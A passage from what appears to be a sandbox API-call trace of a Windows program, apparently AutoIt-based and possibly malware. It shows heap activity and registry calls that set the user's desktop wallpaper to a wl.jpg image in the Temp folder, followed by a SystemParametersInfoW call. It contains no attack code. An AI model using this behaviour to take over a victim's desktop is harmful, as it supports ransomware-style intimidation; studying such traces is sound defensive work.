lpsz="HKCU") returned 0x4 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0284.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0284.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0284.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0284.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0284.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0284.049] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0284.049] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0284.049] RegCloseKey (hKey=0x2d0) returned 0x0 [0284.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0284.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0284.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0284.051] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0284.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0284.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0284.051] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0284.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0284.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0284.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0284.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0284.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0284.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0284.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0284.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0284.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0284.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0284.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0284.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0284.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0284.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0284.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0284.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0284.090] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0284.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0284.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0284.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0284.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0284.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0284.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0284.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0284.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0284.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0284.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0284.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0284.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0284.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0284.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0284.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0284.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0284.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0284.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0284.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0284.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0284.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0284.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0284.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0284.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0284.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0284.095] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0284.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0284.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0284.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0284.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b68 [0284.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b68, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0284.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0284.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0284.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0284.096] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0284.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0284.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0284.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0284.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0284.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0284.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0284.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0284.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0284.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0284.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0284.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0284.097] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0284.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0284.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0284.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0284.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0284.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0284.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0284.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0284.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0284.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0284.184] FreeLibrary (hLibModule=0x750c0000) returned 1 [0284.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0284.184] HeapFree (in: 